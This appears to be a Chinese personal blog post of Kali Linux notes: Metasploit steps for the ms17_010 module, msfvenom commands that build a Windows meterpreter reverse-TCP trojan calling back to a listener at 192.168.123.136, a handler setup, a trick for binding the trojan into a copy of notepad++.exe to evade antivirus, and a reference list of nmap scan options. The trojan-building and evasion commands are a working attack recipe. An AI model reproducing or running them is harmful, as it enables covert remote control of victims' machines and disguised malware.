Ting

Ting

满怀希望就会所向披靡

Kali之metasploit

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
//启动
sudo su
mfsconsole

//搜索模块(以ms17_010为例
search ms17_010 

//查看模块选项并使用模块
show option
set [NAME] [内容]
//必设置项:RHOSTS
//必设置项:payload【攻击载荷,攻击完要做什么】

//运行
run

//进入meterpreter可以用help尝试命令

Msfvenom生成远控木马

1
2
3
4
5
//mfsvenom 用来生成后面软件,在目标机执行后面,本地监听
//mfsvenom shell里面使用

//放木马
msfvenom -ppayload windows/x64/meterpreter/reverse_tcppayload_name:系统/构架/作用/方式】 lhost=192.168.123.136 lport=9999payload设置  -fformat格式 exeWindows内可执行文件 -ooutput demo.exe
1
2
3
4
5
6
//远控木马放进去后监听
use exploit/multi/handler
set payload  windows/x64/meterpreter/reverse_tcp
set lhost 192.168.123.136
set lport 9999
run
1
2
3
4
//免杀木马
	//捆绑木马【原始】
    msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.123.136 lport=9999 -f exe -x【模板】 notepad++.exe -o notepad++.exe
    //加壳:压缩壳,加密壳

Nmap

nmap使用 参数详解

1
2
3
4
-iL filename                    从文件中读取待检测的目标,文件中的表示方法支持机名,ip,网段
-iR hostnum                     随机选取,进行扫描.如果-iR指定为0,则是无休止的扫描
--exclude host1[, host2]        从扫描任务中需要排除的主机           
--exculdefile exclude_file      排除文件中的IP,格式和-iL指定扫描文件的格式相同

主机发现

1
2
3
4
5
6
7
-sL                     仅仅是显示,扫描的IP数目,不会进行任何扫描
-sn                     ping扫描,即主机发现
-Pn                     不检测主机存活
-PS/PA/PU/PY[portlist]  TCP SYN Ping/TCP ACK Ping/UDP Ping发现
-PE/PP/PM               使用ICMP echo, timestamp and netmask 请求包发现主机
-PO[prococol list]      使用IP协议包探测对方主机是否开启   
-n/-R                   不对IP进行域名反向解析/为所有的IP都进行域名的反响解析

扫描技巧

1
2
3
4
5
6
7
8
-sS/sT/sA/sW/sM                 TCP SYN/TCP connect()/ACK/TCP窗口扫描/TCP Maimon扫描
-sU                             UDP扫描
-sN/sF/sX                       TCP Null,FIN,and Xmas扫描
--scanflags                     自定义TCP包中的flags
-sI zombie host[:probeport]     Idlescan
-sY/sZ                          SCTP INIT/COOKIE-ECHO 扫描
-sO                             使用IP protocol 扫描确定目标机支持的协议类型
-b “FTP relay host”             使用FTP bounce scan

指定端口和扫描顺序

0%